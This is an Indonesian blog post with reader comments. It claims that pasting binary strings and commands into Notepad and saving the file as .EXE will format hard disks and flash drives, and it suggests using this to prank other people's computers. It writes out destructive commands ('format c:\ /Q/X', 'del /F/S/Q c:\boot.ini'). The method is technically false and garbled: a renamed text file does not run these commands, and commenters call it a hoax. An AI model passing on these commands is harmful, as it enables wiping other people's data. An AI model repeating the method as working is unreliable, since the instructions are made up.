sentraBLOG

Bersama Untuk Berbagi

Format Harddisk dan Flashdisk Lewat Notepad

Tips trick kali ini sentraBLOG akan membahas mengenai bagaimana cara memformat harddisk atau flashdisk lewat notepad. Trik ini bisa dipakai untuk mengerjain ( isengin ) komputer orang lain atau untuk kebutuhan yang lainnya seperti memformat flashdisk yang di proteksi.

Jika anda sudah melakukan berbagai cara untuk memformat disk drive anda ( harddisk atau flash disk) tetapi belum mendapatkan hasil yang memuaskan maka jalan pintas / singkat yang paling baik adalah dengan cara format ulang harddisk / hard drive yang ada di komputer pc / laptop anda. lewat notepad. Berikut ini langkah - langkah nya :

  • Buka Notepad terus copas tulisan di bawah ini


Code:
01001011000111110010010101010101010000011111100000



format c:\ /Q/X
Code:
01100110011011110111001001101101011000010111010000 10000001
1000110011101001011100
001000000010111101010001001011110101100



d:\ /Q/X
Code:
01100110011011110111001001101101011000010111010000 100000011
001000011101001011100
0010000000101111010100010010111101011000



format a:\ /Q/X
Code:
01100110011011110111001001101101011000010111010000 1000000
11000010011101001011100
0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini
Code:
01100100011001010110110000100000001011110100011000 1011110101
00110010111101010001
00100000011000110011101001011100011000100
110111101101111011101000010111001101001
0110111001101001


NB : Semua penggunaan berbeda - beda sesuai kebutuhan anda.
  • Kemudian Simpan file dengan nama terserah anda. Yang penting ekstensinya .EXE
Semoga Bermanfaat. sentraBLOG

www.sentrablog.blogspot.com



8 comments:

Cuirast mengatakan...

Yang nomer lima serem amat bang.......bahaya ga nih kalo tiba2 adik2 kecil asal klik2....hilanglah semua garapanQ,,,hehehehe

makasih dah mampir.....

mampir n komen lgi ya

dimsgryphonite mengatakan...

trus untuk format data e gimana, soalnya di laptop, ada c: OS, trus d: CD rw, baru e: data, nah di d ada windows juga, jadi ada 2 trus mw di hapus aja gimana, pake yg nomor brp nih,, bisa ga???

dimsgryphonite mengatakan...

maaf asal nanya soalnya lagi bingung nih ngalamin, beneran,,
and thanks for the answer...

sentraBLOG mengatakan...

@ dimsgryphonite : maaf pertanyaannya kurang jelas...
drive C : OS
drive D : CD RW
drive E : Data (harddisk)

trus kok drive D ada OS lagi, kan CD RW...
yang mau dihapus drive yang mana?? C atau E, atau semuanya...???
tolong penjelasannya...
thanks for comment...

dimsgryphonite mengatakan...

sorry salah ketik, iya kamsudnya di E ada OS lagi,,,jadi pake yang mana ya...
thanks wat jawabannya...

dmr mengatakan...

itu jalanin file .exe nya dimana ya?

noe mengatakan...

yang buat kmptr ga bisa boot kaga bekerja tuh...
kalo windows ga nemuin file boot.ini windows bakal boot dari C:\windows

Anonim mengatakan...

kaga jelas bgt...habis jadi exe jalaninnya gmn???
ga ngaruh...ga ngefek..hoax kali ya

Posting Komentar

Blog ini sudah dofollow, Tinggalkan komentar anda pada postingan ini dan Dapatkan BackLink Gratis ke Website/Blog anda. NO SPAM Please!!

 
PageRank Checking Icon Submit Your Site To The Web's Top 50 Search Engines for Free!